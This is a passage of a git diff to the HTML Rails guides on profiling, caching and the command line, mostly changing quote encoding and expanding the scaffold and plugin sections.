    -

    that over a factor of ten difference. Lets look at our flat process time file to see if anything pops out at us.

    +

    that over a factor of ten difference. Lets look at our flat process time file to see if anything pops out at us.

    -
    Example: Process time
    +
    Process time
    20.73      0.39     0.12     0.00     0.27      420  Pathname#cleanpath_aggressive
     17.07      0.14     0.10     0.00     0.04     3186  Pathname#chop_basename
    @@ -790,10 +777,10 @@ http://www.gnu.org/software/src-highlite -->
      2.66      0.09     0.02     0.00     0.07      480  Array#each
      2.46      0.01     0.01     0.00     0.00     3606  Regexp#to_s
    -

    Yes indeed we seem to have found the problem. Pathname#cleanpath_aggressive is taking nearly a quarter our process time and Pathname#chop_basename another 17%. From here I do a few more benchmarks to make sure that these processes are slowing down the other pages. They are so now I know what I must do. If we can get rid of or shorten these processes we can make our pages run much quicker.

    -

    Now both of these are main ruby processes so are goal right now is to find out what other process is calling them. Glancing at our Graph file I see that #cleanpath is calling #cleanpath_aggressive. #cleanpath is being called by String#gsub and from there some html template errors. But my page seems to be rendering fine. why would it be calling template errors. I'm decide to check my object flat file to see if I can find any more information.

    +

    Yes indeed we seem to have found the problem. Pathname#cleanpath_aggressive is taking nearly a quarter our process time and Pathname#chop_basename another 17%. From here I do a few more benchmarks to make sure that these processes are slowing down the other pages. They are so now I know what I must do. If we can get rid of or shorten these processes we can make our pages run much quicker.

    +

    Now both of these are main ruby processes so are goal right now is to find out what other process is calling them. Glancing at our Graph file I see that #cleanpath is calling #cleanpath_aggressive. #cleanpath is being called by String#gsub and from there some html template errors. But my page seems to be rendering fine. why would it be calling template errors. I’m decide to check my object flat file to see if I can find any more information.

    -
    Example: Objects Created
    +
    Objects Created
    20.74  34800.00 12324.00     0.00 22476.00      420  Pathname#cleanpath_aggressive
     16.79  18696.00  9978.00     0.00  8718.00     3186  Pathname#chop_basename
    @@ -801,9 +788,9 @@ http://www.gnu.org/software/src-highlite -->
      8.51  41964.00  5059.00     0.00 36905.00     1386  String#gsub
      6.07   3606.00  3606.00     0.00     0.00     3606  Regexp#to_s
    -

    nope nothing new here. Lets look at memory usage

    +

    nope nothing new here. Lets look at memory usage

    -
    Example: Memory Consuption
    +
    Memory Consuption
     40.17   1706.80  1223.70     0.00   483.10     3186  Pathname#chop_basename
      14.92    454.47   454.47     0.00     0.00     3606  Regexp#to_s
    @@ -811,7 +798,7 @@ http://www.gnu.org/software/src-highlite -->
       5.08    231.19   154.73     0.00    76.46      420  Pathname#prepend_prefix
       2.34     71.35    71.35     0.00     0.00     1265  String#initialize_copy
    -

    Ok so it seems Regexp#to_s is the second costliest process. At this point I try to figure out what could be calling a regular expression cause I very rarely use them. Going over my standard layout I discover at the top.

    +

    Ok so it seems Regexp#to_s is the second costliest process. At this point I try to figure out what could be calling a regular expression cause I very rarely use them. Going over my standard layout I discover at the top.

    <%if request.env["HTTP_USER_AGENT"].match(/Opera/)%>
     <%= stylesheet_link_tag "opera" %>
    -<% end %>
    -
    -

    That's wrong. I mistakenly am using a search function for a simple compare function. Lets fix that.

    +<% end %>
    +

    That’s wrong. I mistakenly am using a search function for a simple compare function. Lets fix that.

    <%if request.env["HTTP_USER_AGENT"] =~ /Opera/%>
     <%= stylesheet_link_tag "opera" %>
    -<% end %>
    -
    -

    I'll now try my test again.

    +<% end %>
+

I’ll now try my test again.

process_time: 75 ms
               memory: 519.95 KB
              objects: 6537
-

Much better. The problem has been solved. Now I should have realized earlier due to the String#gsub that my problem had to be with reqexp serch function but such knowledge comes with time. Looking through the mass output data is a skill.

+

Much better. The problem has been solved. Now I should have realized earlier due to the String#gsub that my problem had to be with reqexp serch function but such knowledge comes with time. Looking through the mass output data is a skill.

8. Get Yourself a Game Plan

-

You end up dealing with a large amount of data whenever you profile an application. It's crucial to use a rigorous approach to analyzing your application's performance else fail miserably in a vortex of numbers. This leads us to -

+

You end up dealing with a large amount of data whenever you profile an application. It’s crucial to use a rigorous approach to analyzing your application’s performance else fail miserably in a vortex of numbers. This leads us to -

8.1. The Analysis Process

-

I’m going to give an example methodology for conducting your benchmarking and profiling on an application. It is based on your typical scientific method.

-

For something as complex as Benchmarking you need to take any methodology with a grain of salt but there are some basic strictures that you can depend on.

-

Formulate a question you need to answer which is simple, tests the smallest measurable thing possible, and is exact. This is typically the hardest part of the experiment. From there some steps that you should follow are.

-
    +

    I’m going to give an example methodology for conducting your benchmarking and profiling on an application. It is based on your typical scientific method.

    +

    For something as complex as Benchmarking you need to take any methodology with a grain of salt but there are some basic strictures that you can depend on.

    +

    Formulate a question you need to answer which is simple, tests the smallest measurable thing possible, and is exact. This is typically the hardest part of the experiment. From there some steps that you should follow are.

    +
    • Develop a set of variables and processes to measure in order to answer this question! @@ -857,10 +842,10 @@ Develop a set of variables and processes to measure in order to answer this ques

      Profile based on the question and variables. Key problems to avoid when designing this experiment are:

      -
        +
        • -Confounding: Test one thing at a time, keep everything the same so you don't poison the data with uncontrolled processes. +Confounding: Test one thing at a time, keep everything the same so you don’t poison the data with uncontrolled processes.

        • @@ -906,18 +891,18 @@ Perform the analysis on the results and determine where to go from there.

        -

        Note: Even though we are using the typical scientific method; developing a hypothesis is not always useful in terms of profiling.

        +

        Note: Even though we are using the typical scientific method; developing a hypothesis is not always useful in terms of profiling.

      9. Other Profiling Tools

      -

      There are a lot of great profiling tools out there. Some free, some not so free. This is a sort list detailing some of them.

      +

      There are a lot of great profiling tools out there. Some free, some not so free. This is a sort list detailing some of them.

      9.1. httperf

      - -

      A necessary tool in your arsenal. Very useful for load testing your website.

      -

      #TODO write and link to a short article on how to use httperf. Anybody have a good tutorial availble.

      + +

      A necessary tool in your arsenal. Very useful for load testing your website.

      +

      #TODO write and link to a short article on how to use httperf. Anybody have a good tutorial availble.

      9.2. Rails Analyzer

      -

      The Rails Analyzer project contains a collection of tools for Rails. It's open source and pretty speedy. It's not being actively worked on but is still contains some very useful tools.

      -
        +

        The Rails Analyzer project contains a collection of tools for Rails. It’s open source and pretty speedy. It’s not being actively worked on but is still contains some very useful tools.

        +
        • The Production Log Analyzer examines Rails log files and gives back a report. It also includes action_grep which will give you all log results for a particular action. @@ -939,24 +924,24 @@ The SQL Dependency Grapher allows you to visualize the frequency of table depend

        -

        Their project homepage can be found at http://rails-analyzer.rubyforge.org/

        -

        The one major caveat is that it needs your log to be in a different format from how rails sets it up specifically SyslogLogger.

        +

        Their project homepage can be found at http://rails-analyzer.rubyforge.org/

        +

        The one major caveat is that it needs your log to be in a different format from how rails sets it up specifically SyslogLogger.

        9.2.1. SyslogLogger

        -

        SyslogLogger is a Logger work-alike that logs via syslog instead of to a file. You can add SyslogLogger to your Rails production environment to aggregate logs between multiple machines.

        - -

        If you don't have access to your machines root system or just want something a bit easier to implement there is also a module developed by Geoffrey Grosenbach

        +

        SyslogLogger is a Logger work-alike that logs via syslog instead of to a file. You can add SyslogLogger to your Rails production environment to aggregate logs between multiple machines.

        + +

        If you don’t have access to your machines root system or just want something a bit easier to implement there is also a module developed by Geoffrey Grosenbach

        9.2.2. A Hodel 3000 Compliant Logger for the Rest of Us

        -

        Directions taken from +

        Directions taken from link to module file

        -

        Just put the module in your lib directory and add this to your environment.rb in it's config portion.

        +

        Just put the module in your lib directory and add this to your environment.rb in it’s config portion.

        require 'hodel_3000_compliant_logger'
         config.logger = Hodel3000CompliantLogger.new(config.log_path)
        -

        It's that simple. Your log output on restart should look like this.

        +

        It’s that simple. Your log output on restart should look like this.

        -
        Example: Hodel 3000 Example
        +
        Hodel 3000 Example
        Jul 15 11:45:43 matthew-bergmans-macbook-pro-15 rails[16207]:
         Parameters: {"action"=>"shipping", "controller"=>"checkout"}
        @@ -985,20 +970,20 @@ Jul 15 11:45:43 matthew-bergmans-macbook-pro-15 rails[16207]:
         Completed in 0.37297 (2 reqs/sec) | Rendering: 0.02971 (7%) | DB: 0.01697 (4%) | 200 OK [https://secure.jeffbooks/checkout/shipping]

        9.3. Palmist

        -

        An open source mysql query analyzer. Full featured and easy to work with. Also requires Hodel 3000 +

        An open source mysql query analyzer. Full featured and easy to work with. Also requires Hodel 3000 http://www.flyingmachinestudios.com/projects/

        9.4. New Relic

        - -

        Pretty nifty performance tools, pricey though. They do have a basic free +

        +

        Pretty nifty performance tools, pricey though. They do have a basic free service both for when in development and when you put your application into production. Very simple installation and signup.

        -

        #TODO more in-depth without being like an advertisement.

        +

        #TODO more in-depth without being like an advertisement.

        9.4.1. Manage

        -

        Like new relic a production monitoring tool.

        +

        Like new relic a production monitoring tool.

        10. Changelog

        - -
          + +
          • October 17, 2008: First revision by Pratik diff --git a/railties/doc/guides/html/caching_with_rails.html b/railties/doc/guides/html/caching_with_rails.html index 32a98d1314..f05ebe913c 100644 --- a/railties/doc/guides/html/caching_with_rails.html +++ b/railties/doc/guides/html/caching_with_rails.html @@ -229,16 +229,16 @@ ul#navMain {

            Caching with Rails: An overview

            -

            Everyone caches. This guide will teach you what you need to know about +

            Everyone caches. This guide will teach you what you need to know about avoiding that expensive round-trip to your database and returning what you need to return to those hungry web clients in the shortest time possible.

            1. Basic Caching

            -

            This is an introduction to the three types of caching techniques that Rails +

            This is an introduction to the three types of caching techniques that Rails provides by default without the use of any third party plugins.

            -

            To get started make sure config.action_controller.perform_caching is set +

            To get started make sure config.action_controller.perform_caching is set to true for your environment. This flag is normally set in the corresponding config/environments/*.rb and caching is disabled by default there for development and test, and enabled for production.

            @@ -247,16 +247,15 @@ there for development and test, and enabled for production.

            by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
            config.action_controller.perform_caching = true
            -
            +
            config.action_controller.perform_caching = true

          1.1. Page Caching

          -

          Page caching is a Rails mechanism which allows the request for a generated +

          Page caching is a Rails mechanism which allows the request for a generated page to be fulfilled by the webserver, without ever having to go through the -Rails stack at all. Obviously, this is super-fast. Unfortunately, it can't be +Rails stack at all. Obviously, this is super-fast. Unfortunately, it can’t be applied to every situation (such as pages that need authentication) and since the webserver is literally just serving a file from the filesystem, cache expiration is an issue that needs to be dealt with.

          -

          So, how do you enable this super-fast cache behavior? Simple, let's say you +

          So, how do you enable this super-fast cache behavior? Simple, let’s say you have a controller called ProductsController and a list action that lists all the products

          @@ -270,23 +269,22 @@ http://www.gnu.org/software/src-highlite --> def index; end -end -
          -

          The first time anyone requests products/index, Rails will generate a file +end

          +

          The first time anyone requests products/index, Rails will generate a file called index.html and the webserver will then look for that file before it passes the next request for products/index to your Rails application.

          -

          By default, the page cache directory is set to Rails.public_path (which is +

          By default, the page cache directory is set to Rails.public_path (which is usually set to RAILS_ROOT + "/public") and this can be configured by changing the configuration setting config.action_controller.page_cache_directory. Changing the default from /public helps avoid naming conflicts, since you may want to put other static html in /public, but changing this will require web server reconfiguration to let the web server know where to serve the cached files from.

          -

          The Page Caching mechanism will automatically add a .html exxtension to +

          The Page Caching mechanism will automatically add a .html exxtension to requests for pages that do not have an extension to make it easy for the webserver to find those pages and this can be configured by changing the configuration setting config.action_controller.page_cache_extension.

          -

          In order to expire this page when a new product is added we could extend our +

          In order to expire this page when a new product is added we could extend our example controler like this:

          expire_page :action => :list end -end -
          -

          If you want a more complicated expiration scheme, you can use cache sweepers +end

          +

          If you want a more complicated expiration scheme, you can use cache sweepers to expire cached objects when things change. This is covered in the section on Sweepers.

          1.2. Action Caching

          -

          One of the issues with Page Caching is that you cannot use it for pages that +

          One of the issues with Page Caching is that you cannot use it for pages that require to restrict access somehow. This is where Action Caching comes in. Action Caching works like Page Caching except for the fact that the incoming web request does go from the webserver to the Rails stack and Action Pack so that before filters can be run on it before the cache is served, so that authentication and other restrictions can be used while still serving the result of the output from a cached copy.

          -

          Clearing the cache works in the exact same way as with Page Caching.

          -

          Let's say you only wanted authenticated users to edit or create a Product +

          Clearing the cache works in the exact same way as with Page Caching.

          +

          Let’s say you only wanted authenticated users to edit or create a Product object, but still cache those pages:

          def edit; end -end -
          -

          And you can also use :if (or :unless) to pass a Proc that specifies when the -action should be cached. Also, you can use :layout ⇒ false to cache without +end

          +

          And you can also use :if (or :unless) to pass a Proc that specifies when the +action should be cached. Also, you can use :layout => false to cache without layout so that dynamic information in the layout such as logged in user info or the number of items in the cart can be left uncached. This feature is available as of Rails 2.2.

          -

          [More: more examples? Walk-through of Action Caching from request to response? +

          [More: more examples? Walk-through of Action Caching from request to response? Description of Rake tasks to clear cached files? Show example of subdomain caching? Talk about :cache_path, :if and assing blocks/Procs to expire_action?]

          1.3. Fragment Caching

          -

          Life would be perfect if we could get away with caching the entire contents of +

          Life would be perfect if we could get away with caching the entire contents of a page or action and serving it out to the world. Unfortunately, dynamic web applications usually build pages with a variety of components not all of which have the same caching characteristics. In order to address such a dynamically created page where different parts of the page need to be cached and expired differently Rails provides a mechanism called Fragment Caching.

          -

          Fragment Caching allows a fragment of view logic to be wrapped in a cache +

          Fragment Caching allows a fragment of view logic to be wrapped in a cache block and served out of the cache store when the next request comes in.

          -

          As an example, if you wanted to show all the orders placed on your website -in real time and didn't want to cache that part of the page, but did want +

          As an example, if you wanted to show all the orders placed on your website +in real time and didn’t want to cache that part of the page, but did want to cache the part of the page which lists all products available, you could use this piece of code:

          @@ -376,9 +372,8 @@ http://www.gnu.org/software/src-highlite --> <% Product.find(:all).each do |p| %> <%= link_to p.name, product_url(p) %> <% end %> -<% end %> -
          -

          The cache block in our example will bind to the action that called it and is +<% end %>

          +

          The cache block in our example will bind to the action that called it and is written out to the same place as the Action Cache, which means that if you want to cache multiple fragments per action, you should provide an action_suffix to the cache call:

          @@ -387,17 +382,15 @@ by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite -->
          <% cache(:action => 'recent', :action_suffix => 'all_products') do %>
          -  All available products:
          -
          -

          and you can expire it using the expire_fragment method, like so:

          + All available products:
          +

          and you can expire it using the expire_fragment method, like so:

          -
          expire_fragment(:controller => 'products', :action => 'recent', :action_suffix => 'all_products)
          -
          -

          If you don't want the cache block to bind to the action that called it, You can +

          expire_fragment(:controller => 'products', :action => 'recent', :action_suffix => 'all_products)
          +

          If you don’t want the cache block to bind to the action that called it, You can also use globally keyed fragments by calling the cache method with a key, like so:

          @@ -406,25 +399,23 @@ by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite -->
          <% cache(:key => ['all_available_products', @latest_product.created_at].join(':')) do %>
          -  All available products:
          -
          -

          This fragment is then available to all actions in the ProductsController using + All available products:

        +

        This fragment is then available to all actions in the ProductsController using the key and can be expired the same way:

        -
        expire_fragment(:key => ['all_available_products', @latest_product.created_at].join(':'))
        -
        +
        expire_fragment(:key => ['all_available_products', @latest_product.created_at].join(':'))

        1.4. Sweepers

        -

        Cache sweeping is a mechanism which allows you to get around having a ton of +

        Cache sweeping is a mechanism which allows you to get around having a ton of expire_{page,action,fragment} calls in your code by moving all the work required to expire cached content into a ActionController::Caching::Sweeper class that is an Observer and looks for changes to an object via callbacks, and when a change occurs it expires the caches associated with that object n an around or after filter.

        -

        Continuing with our Product controller example, we could rewrite it with a +

        Continuing with our Product controller example, we could rewrite it with a sweeper such as the following:

        class StoreSweeper < ActionController::Caching::Sweeper
        -  observe Product # This sweeper is going to keep an eye on the Post model
        +  observe Product # This sweeper is going to keep an eye on the Product model
         
        -  # If our sweeper detects that a Post was created call this
        +  # If our sweeper detects that a Product was created call this
           def after_create(product)
                   expire_cache_for(product)
           end
         
        -  # If our sweeper detects that a Post was updated call this
        +  # If our sweeper detects that a Product was updated call this
           def after_update(product)
                   expire_cache_for(product)
           end
         
        -  # If our sweeper detects that a Post was deleted call this
        +  # If our sweeper detects that a Product was deleted call this
           def after_destroy(product)
                   expire_cache_for(product)
           end
        @@ -457,9 +448,8 @@ http://www.gnu.org/software/src-highlite -->
             # Expire a fragment
             expire_fragment(:controller => '#{record}', :action => 'recent', :action_suffix => 'all_products')
           end
        -end
        -
        -

        Then we add it to our controller to tell it to call the sweeper when certain +end

        +

        Then we add it to our controller to tell it to call the sweeper when certain actions are called. So, if we wanted to expire the cached content for the list and edit actions when the create action was called, we could do the following:

        @@ -484,14 +474,13 @@ http://www.gnu.org/software/src-highlite --> def edit; end -end -
        +end

      1.5. SQL Caching

      -

      Query caching is a Rails feature that caches the result set returned by each +

      Query caching is a Rails feature that caches the result set returned by each query so that if Rails encounters the same query again for that request, it will used the cached result set as opposed to running the query against the database again.

      -

      For example:

      +

      For example:

      def edit; end -end -
      -

      In the list action above, the result set returned by the first +end

      +

      In the list action above, the result set returned by the first Product.find(:all) will be cached and will be used to avoid querying the database again the second time that finder is called.

      -

      Query caches are created at the start of an action and destroyed at the end of +

      Query caches are created at the start of an action and destroyed at the end of that action and thus persist only for the duration of the action.

      1.6. Cache stores

      -

      Rails provides different stores for the cached data for action and fragment +

      Rails provides different stores for the cached data for action and fragment caches. Page caches are always stored on disk.

      -

      The cache stores provided include:

      -

      1) Memory store: Cached data is stored in the memory allocated to the Rails +

      The cache stores provided include:

      +

      1) Memory store: Cached data is stored in the memory allocated to the Rails process, which is fine for WEBrick and for FCGI (if you - don't care that each FCGI process holds its own fragment - store). It's not suitable for CGI as the process is thrown + don’t care that each FCGI process holds its own fragment + store). It’s not suitable for CGI as the process is thrown away at the end of each request. It can potentially also take up a lot of memory since each process keeps all the caches in memory.

      @@ -544,9 +532,8 @@ caches. Page caches are always stored on disk.

      by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
      ActionController::Base.cache_store = :memory_store
      -
      -

      2) File store: Cached data is stored on the disk, this is the default store +

      ActionController::Base.cache_store = :memory_store
    +

    2) File store: Cached data is stored on the disk, this is the default store and the default path for this store is: /tmp/cache. Works well for all types of environments and allows all processes running from the same application directory to access the @@ -556,9 +543,8 @@ http://www.gnu.org/software/src-highlite --> by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -

    ActionController::Base.cache_store = :file_store, "/path/to/cache/directory"
    -
-

3) DRb store: Cached data is stored in a separate shared DRb process that all +

ActionController::Base.cache_store = :file_store, "/path/to/cache/directory"
+

3) DRb store: Cached data is stored in a separate shared DRb process that all servers communicate with. This works for all environments and only keeps one cache around for all processes, but requires that you run and manage a separate DRb process.

@@ -567,41 +553,38 @@ http://www.gnu.org/software/src-highlite --> by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
ActionController::Base.cache_store = :drb_store, "druby://localhost:9192"
-
-

4) MemCached store: Works like DRbStore, but uses Danga's MemCache instead. +

ActionController::Base.cache_store = :drb_store, "druby://localhost:9192"
+

4) MemCached store: Works like DRbStore, but uses Danga’s MemCache instead. Rails uses the bundled memcached-client gem by default.

-
ActionController::Base.cache_store = :mem_cache_store, "localhost"
-
-

5) Custom store: You can define your own cache store (new in Rails 2.1)

+
ActionController::Base.cache_store = :mem_cache_store, "localhost"
+

5) Custom store: You can define your own cache store (new in Rails 2.1)

-
ActionController::Base.cache_store = MyOwnStore.new("parameter")
-
-

Note: config.cache_store can be used in place of +

ActionController::Base.cache_store = MyOwnStore.new("parameter")
+

Note: config.cache_store can be used in place of ActionController::Base.cache_store in your Rails::Initializer.run block in environment.rb

2. Conditional GET support

-

Conditional GETs are a facility of the HTTP spec that provide a way for web +

Conditional GETs are a facility of the HTTP spec that provide a way for web servers to tell browsers that the response to a GET request hasn’t changed since the last request and can be safely pulled from the browser cache.

-

They work by using the HTTP_IF_NONE_MATCH and HTTP_IF_MODIFIED_SINCE headers to +

They work by using the HTTP_IF_NONE_MATCH and HTTP_IF_MODIFIED_SINCE headers to pass back and forth both a unique content identifier and the timestamp of when the content was last changed. If the browser makes a request where the content identifier (etag) or last modified since timestamp matches the server’s version then the server only needs to send back an empty response with a not modified status.

-

It is the server’s (i.e. our) responsibility to look for a last modified +

It is the server’s (i.e. our) responsibility to look for a last modified timestamp and the if-none-match header and determine whether or not to send back the full response. With conditional-get support in rails this is a pretty easy task:

@@ -627,9 +610,8 @@ http://www.gnu.org/software/src-highlite --> # anything. The default render checks for this using the parameters # used in the previous call to stale? and will automatically send a # :not_modified. So that's it, you're done. -end -
-

If you don’t have any special response processing and are using the default +end

+

If you don’t have any special response processing and are using the default rendering mechanism (i.e. you’re not using respond_to or calling render yourself) then you’ve got an easy helper in fresh_when:

@@ -646,15 +628,14 @@ http://www.gnu.org/software/src-highlite --> @product = Product.find(params[:id]) fresh_when :last_modified => @product.published_at.utc, :etag => @article end -end -
+end

3. Advanced Caching

-

Along with the built-in mechanisms outlined above, a number of excellent +

Along with the built-in mechanisms outlined above, a number of excellent plugins exist to help with finer grained control over caching. These include -Chris Wanstrath's excellent cache_fu plugin (more info here: -http://errtheblog.com/posts/57-kickin-ass-w-cachefu) and Evan Weaver's +Chris Wanstrath’s excellent cache_fu plugin (more info here: +http://errtheblog.com/posts/57-kickin-ass-w-cachefu) and Evan Weaver’s interlock plugin (more info here: http://blog.evanweaver.com/articles/2007/12/13/better-rails-caching/). Both of these plugins play nice with memcached and are a must-see for anyone diff --git a/railties/doc/guides/html/command_line.html b/railties/doc/guides/html/command_line.html index 2a28da177e..0890c3bbe7 100644 --- a/railties/doc/guides/html/command_line.html +++ b/railties/doc/guides/html/command_line.html @@ -208,6 +208,18 @@ ul#navMain {

  • generate
  • +
  • console
  • + +
  • dbconsole
  • + +
  • plugin
  • + +
  • runner
  • + +
  • destroy
  • + +
  • about
  • + @@ -217,8 +229,8 @@ ul#navMain {

    A Guide to The Rails Command Line

    -

    Rails comes with every command line tool you'll need to

    -
      +

      Rails comes with every command line tool you’ll need to

      +
      • Create a Rails application @@ -245,14 +257,14 @@ Profile and benchmark your new creation

      -

      … and much, much more! (Buy now!)

      -

      This tutorial assumes you have basic Rails knowledge from reading the Getting Started with Rails Guide.

      +

      ... and much, much more! (Buy now!)

      +

      This tutorial assumes you have basic Rails knowledge from reading the Getting Started with Rails Guide.

    1. Command Line Basics

    -

    There are a few commands that are absolutely critical to your everyday usage of Rails. In the order of how much you'll probably use them are:

    -
      +

      There are a few commands that are absolutely critical to your everyday usage of Rails. In the order of how much you’ll probably use them are:

      +
      • console @@ -279,9 +291,9 @@ rails

      -

      Let's create a simple Rails application to step through each of these commands in context.

      +

      Let’s create a simple Rails application to step through each of these commands in context.

      1.1. rails

      -

      The first thing we'll want to do is create a new Rails application by running the rails command after installing Rails.

      +

      The first thing we’ll want to do is create a new Rails application by running the rails command after installing Rails.

      +
      Editor’s note:
      If you haven’t set up the custom route from above, script/destroy will fail and you’ll have to remove it manually.
      @@ -305,9 +317,8 @@ http://www.gnu.org/software/src-highlite --> ... create log/production.log create log/development.log - create log/test.log - -

      Rails will set you up with what seems like a huge amount of stuff for such a tiny command! You've got the entire Rails directory structure now with all the code you need to run our simple application right out of the box.

      + create log/test.log +

      Rails will set you up with what seems like a huge amount of stuff for such a tiny command! You’ve got the entire Rails directory structure now with all the code you need to run our simple application right out of the box.

      @@ -317,16 +328,16 @@ http://www.gnu.org/software/src-highlite -->

      1.2. server

      -

      Let's try it! The server command launches a small web server written in Ruby named WEBrick which was also installed when you installed Rails. You'll use this any time you want to view your work through a web browser.

      +

      Let’s try it! The server command launches a small web server named WEBrick which comes bundled with Ruby. You’ll use this any time you want to view your work through a web browser.

      - +
      Note WEBrick isn't your only option for serving Rails. We'll get to that in a later section. [XXX: which section]WEBrick isn’t your only option for serving Rails. We’ll get to that in a later section. [XXX: which section]
      -

      Here we'll flex our server command, which without any prodding of any kind will run our new shiny Rails app:

      +

      Here we’ll flex our server command, which without any prodding of any kind will run our new shiny Rails app:

      create app/controllers/greetings_controller.rb create test/functional/greetings_controller_test.rb create app/helpers/greetings_helper.rb - create app/views/greetings/hello.html.erb -
      -

      Look there! Now what all did this generate? It looks like it made sure a bunch of directories were in our application, and created a controller file, a functional test file, a helper for the view, and a view file.

      -

      Let's check out the controller and modify it a little (in app/controllers/greeting_controller.rb):

      + create app/views/greetings/hello.html.erb +

      Look there! Now what all did this generate? It looks like it made sure a bunch of directories were in our application, and created a controller file, a functional test file, a helper for the view, and a view file.

      +

      Let’s check out the controller and modify it a little (in app/controllers/greeting_controller.rb):

      @message = "Hello, how are you today? I am exuberant!" end -end -
      -

      Then the view, to display our nice message (in app/views/greeting/hello.html.erb):

      +end +

      Then the view, to display our nice message (in app/views/greeting/hello.html.erb):

      <h1>A Greeting for You!</h1>
      -<p><%= @message %></p>
      -
      -

      Deal. Go check it out in your browser. Fire up your server. Remember? ./script/server at the root of your Rails application should do it.

      +<p><%= @message %></p> +

      Deal. Go check it out in your browser. Fire up your server. Remember? ./script/server at the root of your Rails application should do it.

      $ ./script/server
      -=> Booting WEBrick...
      -
      -

      The URL will be http://localhost:3000/greetings/hello. I'll wait for you to be suitably impressed.

      +=> Booting WEBrick... +

      The URL will be http://localhost:3000/greetings/hello. I’ll wait for you to be suitably impressed.

      @@ -466,7 +470,7 @@ http://www.gnu.org/software/src-highlite --> With a normal, plain-old Rails application, your URLs will generally follow the pattern of http://(host)/(controller)/(action), and a URL like http://(host)/(controller) will hit the index action of that controller.
      -

      "What about data, though?", you ask over a cup of coffee. Rails comes with a generator for data models too. Can you guess its generator name?

      +

      "What about data, though?", you ask over a cup of coffee. Rails comes with a generator for data models too. Can you guess its generator name?

      -
      $ ./script/generate model HighScore id:integer game:string score:integer
      -      exists  app/models/
      -      exists  test/unit/
      -      exists  test/fixtures/
      -      create  app/models/high_score.rb
      -      create  test/unit/high_score_test.rb
      -      create  test/fixtures/high_scores.yml
      -      create  db/migrate
      -      create  db/migrate/20081126032945_create_high_scores.rb
      -
      -

      Taking it from the top, we have the models directory, where all of your data models live. test/unit, where all the unit tests live (gasp! — unit tests!), fixtures for those tests, a test, the migrate directory, where the database-modifying migrations live, and a migration to create the high_scores table with the right fields.

      -

      The migration requires that we migrate, that is, run some Ruby code (living in that 20081126032945_create_high_scores.rb) to modify the schema of our database. Which database? The sqlite3 database that Rails will create for you when we run the rake db:migrate command. We'll talk more about Rake in-depth in a little while.

      +
      $ ./script/generate scaffold HighScore game:string score:integer
      +    exists  app/models/
      +    exists  app/controllers/
      +    exists  app/helpers/
      +    create  app/views/high_scores
      +    create  app/views/layouts/
      +    exists  test/functional/
      +    create  test/unit/
      +    create  public/stylesheets/
      +    create  app/views/high_scores/index.html.erb
      +    create  app/views/high_scores/show.html.erb
      +    create  app/views/high_scores/new.html.erb
      +    create  app/views/high_scores/edit.html.erb
      +    create  app/views/layouts/high_scores.html.erb
      +    create  public/stylesheets/scaffold.css
      +    create  app/controllers/high_scores_controller.rb
      +    create  test/functional/high_scores_controller_test.rb
      +    create  app/helpers/high_scores_helper.rb
      +     route  map.resources :high_scores
      +dependency  model
      +    exists    app/models/
      +    exists    test/unit/
      +    create    test/fixtures/
      +    create    app/models/high_score.rb
      +    create    test/unit/high_score_test.rb
      +    create    test/fixtures/high_scores.yml
      +    exists    db/migrate
      +    create    db/migrate/20081217071914_create_high_scores.rb
      +

      Taking it from the top - the generator checks that there exist the directories for models, controllers, helpers, layouts, functional and unit tests, stylesheets, creates the views, controller, model and database migration for HighScore (creating the high_scores table and fields), takes care of the route for the resource, and new tests for everything.

      +

      The migration requires that we migrate, that is, run some Ruby code (living in that 20081217071914_create_high_scores.rb) to modify the schema of our database. Which database? The sqlite3 database that Rails will create for you when we run the rake db:migrate command. We’ll talk more about Rake in-depth in a little while.

      +
      + + + +
      +Note +Hey. Install the sqlite3-ruby gem while you’re at it. gem install sqlite3-ruby
      +
      == CreateHighScores: migrating =============================================== -- create_table(:high_scores) -> 0.0070s -== CreateHighScores: migrated (0.0077s) ====================================== -
      +== CreateHighScores: migrated (0.0077s) ======================================
      - +
      Note Let's talk about unit tests. Unit tests are code that tests and makes assertions about code. In unit testing, we take a little part of code, say a method of a model, and test its inputs and outputs. Unit tests are your friend. The sooner you make peace with the fact that your quality of life will drastically increase when you unit test your code, the better. Seriously. We'll make one in a moment.Let’s talk about unit tests. Unit tests are code that tests and makes assertions about code. In unit testing, we take a little part of code, say a method of a model, and test its inputs and outputs. Unit tests are your friend. The sooner you make peace with the fact that your quality of life will drastically increase when you unit test your code, the better. Seriously. We’ll make one in a moment.
      -

      Yo! Let's shove a small table into our greeting controller and view, listing our sweet scores.

      +

      Let’s see the interface Rails created for us. ./script/server; http://localhost:3000/high_scores

      +

      We can create new high scores (55,160 on Space Invaders!)

      +

      1.4. console

      +

      The console command lets you interact with your Rails application from the command line. On the underside, script/console uses IRB, so if you’ve ever used it, you’ll be right at home. This is useful for testing out quick ideas with code and changing data server-side without touching the website.

      +

      1.5. dbconsole

      +

      dbconsole figures out which database you’re using and drops you into whichever command line interface you would use with it (and figures out the command line parameters to give to it, too!). It supports MySQL, PostgreSQL, SQLite and SQLite3.

      +

      1.6. plugin

      +

      The plugin command simplifies plugin management; think a miniature version of the Gem utility. Let’s walk through installing a plugin. You can call the sub-command discover, which sifts through repositories looking for plugins, or call source to add a specific repository of plugins, or you can specify the plugin location directly.

      +

      Let’s say you’re creating a website for a client who wants a small accounting system. Every event having to do with money must be logged, and must never be deleted. Wouldn’t it be great if we could override the behavior of a model to never actually take its record out of the database, but instead, just set a field?

      +

      There is such a thing! The plugin we’re installing is called "acts_as_paranoid", and it lets models implement a "deleted_at" column that gets set when you call destroy. Later, when calling find, the plugin will tack on a database check to filter out "deleted" things.

      -
      class GreetingController < ApplicationController
      -  def hello
      -    if request.post?
      -      score = HighScore.new(params[:high_score])
      -      if score.save
      -        flash[:notice] = "New score posted!"
      -      end
      -    end
      -
      -    @scores = HighScore.find(:all)
      -  end
      -
      -end
      -
      -

      XXX: Go with scaffolding instead, modifying greeting controller for high scores seems dumb.

      +
      $ ./script/plugin install http://svn.techno-weenie.net/projects/plugins/acts_as_paranoid
      ++ ./CHANGELOG
      ++ ./MIT-LICENSE
      +...
      +...
      +

      1.7. runner

      +
